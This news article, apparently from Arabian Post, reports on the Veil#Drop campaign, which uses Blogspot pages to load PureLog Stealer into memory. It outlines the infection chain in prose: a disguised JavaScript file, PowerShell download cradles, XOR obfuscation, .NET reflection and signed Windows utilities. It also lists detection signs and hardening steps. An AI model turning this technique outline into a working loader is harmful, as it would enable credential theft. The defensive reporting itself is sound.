Just in:
France and Oman press toll-free Hormuz passage // Doha talks test fragile US-Iran truce // PRHK 2026 Benchmark Report highlights how Hong Kong’s IPO revival, AI, and the GBA are reshaping the SAR’s PR industry // CG Capital, the Leader in Branded Residences in Thailand, Marks Milestone Success for InterContinental Residences Bangkok Asoke Amid Global Economic Uncertainty // Why your AI transformation can fail — and it’s not the technology // China’s digital hub Hangzhou hosts conference on AI, OPC // The 6th Cross-Strait Sun Yat-sen Forum Successfully Held in Zhongshan, Guangdong // Doha diplomacy advances despite Hormuz strains // DSQ Real Estate Highlights Post-Purchase Advisory as a Growing Need for Overseas Dubai Property Owners // Save the Children Hong Kong’s Play to Thrive: Prioritising Personal Growth Over Competitive Success // Dubai property buyers pivot towards durable value // ADIA backs Luxshare’s Hong Kong float // Payments giants back shared Open USD stablecoin // Crypto income reshapes Trump business empire // Toblerone Presents ” The Ultimate Gift “: The Toblerone Crystal Bar crafted by Swarovski // BateriHub, Global Energy Battery Partner MNA Metal to Tighten Malaysia’s Used Battery Recycling Chain // #LUXMyWill: Beauty Brand LUX Turns “#BuryMeInThis” From Social Media Trend Into Legal Declaration // Binance faces UK investor claim over derivatives // Ousaban widens banking threat across Iberia // Bangladesh-China Joint Statement On Teesta Cooperation Poses A Big Challenge To India //

Blogspot used in stealth infostealer campaign

A fileless malware framework is abusing Google’s Blogspot platform to deliver PureLog Stealer directly into computer memory, sharpening concerns that trusted web services are being turned into staging grounds for credential theft.

The campaign, tracked as Veil#Drop, begins with a JavaScript file disguised as a document, such as “transcript. pdf. js”. Once opened on a Windows system, the file runs through Windows Script Host and launches PowerShell with execution-policy bypasses enabled. The command then retrieves further payloads from attacker-controlled Blogspot pages, allowing the malicious traffic to blend with ordinary access to Google-owned infrastructure.

Security researchers said the framework loads PureLog Stealer through a chain of PowerShell download cradles, XOR-obfuscated code and. NET reflection, avoiding the need to write a conventional executable file to disk. The final payload is designed to harvest browser credentials, cookies, autofill data, browsing history, cryptocurrency wallet details and system information.

ADVERTISEMENT

The use of Blogspot marks a notable escalation in the misuse of mainstream cloud and publishing platforms. By staging payloads on a familiar domain, attackers can reduce suspicion and weaken reputation-based blocking. The technique also complicates incident response because defenders may be reluctant to block an entire trusted service without disrupting legitimate users.

Veil#Drop relies heavily on native Windows tools. The initial JavaScript launcher spawns PowerShell, which retrieves and executes code in memory. Later stages reconstruct encrypted. NET assemblies at runtime and load them through reflection. The framework also includes fallback execution through Microsoft-signed utilities such as RegSvcs, InstallUtil, MSBuild, CSC, VBC and AspNet_Compiler, a tactic often described as “living off the land” because it uses legitimate binaries already present on the system.

The campaign’s social-engineering component remains central to its success. Attackers use double extensions and document-themed names to exploit the way many Windows systems hide known file extensions by default. A victim may see what appears to be a PDF, while the operating system executes a JavaScript file. The approach does not require a software vulnerability; it relies on trust, routine office behaviour and poor visibility into file types.

PureLog Stealer has become a persistent presence in credential-theft campaigns over the past year. Earlier operations used copyright complaint lures, invoice themes, purchase-order messages and malicious archives to push PureLogs variants at organisations and individuals. Other delivery chains have used encrypted payloads hidden inside image files, process hollowing and PowerShell-based loaders to evade static inspection.

The malware family is valued by criminals because stolen browser cookies and session tokens can bypass some multi-factor authentication protections. Once a session token is taken from an infected device, attackers may be able to access cloud email, business applications or cryptocurrency accounts without needing the victim’s password again. That risk is especially acute for finance teams, media organisations, government offices and small businesses that rely heavily on browser-based services.

The campaign also reflects a broader shift away from noisy malware droppers towards modular infection chains. Rather than placing a full malicious executable on the endpoint, attackers use small launchers, trusted services, encrypted blobs and memory-only execution. Each stage performs a narrow task, making detection harder and giving operators room to update infrastructure quickly if a domain or payload is blocked.

For defenders, the case highlights the limits of signature-based antivirus tools. Useful warning signs include unusual parent-child process chains such as wscript. exe launching powershell. exe, PowerShell using Invoke-RestMethod or Invoke-Expression to fetch remote content, encoded command execution, unexplained access to Blogspot URLs from endpoints, and. NET assemblies being loaded directly into memory. Monitoring trusted Microsoft utilities for abnormal execution is also becoming more important as attackers increasingly use them as fallback launch paths.

The practical response is less about blocking one platform and more about tightening execution controls. Organisations can reduce exposure by showing file extensions by default, restricting Windows Script Host where it is not required, applying PowerShell logging and constrained language mode, monitoring command-line activity, limiting outbound traffic from user endpoints, and using behavioural detection capable of flagging memory-only malware chains.



Notice an issue?

Arabian Post strives to deliver the most accurate and reliable information to its readers. If you believe you have identified an error or inconsistency in this article, please don't hesitate to contact our editorial team at editor[at]thearabianpost[dot]com. We are committed to promptly addressing any concerns and ensuring the highest level of journalistic integrity.


ADVERTISEMENT
Social Media Auto Publish Powered By : XYZScripts.com
Just in:
Why your AI transformation can fail — and it’s not the technology // JUSTCO APP Enables On-Demand Booking Of Workspaces – No Monthly Membership Required // The 6th Cross-Strait Sun Yat-sen Forum Successfully Held in Zhongshan, Guangdong // This summer will never stop us from our wellness routine // Doha diplomacy advances despite Hormuz strains // DSQ Real Estate Highlights Post-Purchase Advisory as a Growing Need for Overseas Dubai Property Owners // CG Capital, the Leader in Branded Residences in Thailand, Marks Milestone Success for InterContinental Residences Bangkok Asoke Amid Global Economic Uncertainty // #LUXMyWill: Beauty Brand LUX Turns “#BuryMeInThis” From Social Media Trend Into Legal Declaration // Dubai property buyers pivot towards durable value // PRHK 2026 Benchmark Report highlights how Hong Kong’s IPO revival, AI, and the GBA are reshaping the SAR’s PR industry // Dubai advances Gold Line contractor race // Crypto income reshapes Trump business empire // Kuwait taps banks for new sovereign loan // BateriHub, Global Energy Battery Partner MNA Metal to Tighten Malaysia’s Used Battery Recycling Chain // Taiwan International Plant-Based Festival Launches in Singapore: High-End Culinary Partnerships and Diplomatic Exhibitions Shape Premium Agri-Product Branding // China’s digital hub Hangzhou hosts conference on AI, OPC // Payments giants back shared Open USD stablecoin // Bangladesh-China Joint Statement On Teesta Cooperation Poses A Big Challenge To India // Ousaban widens banking threat across Iberia // France and Oman press toll-free Hormuz passage //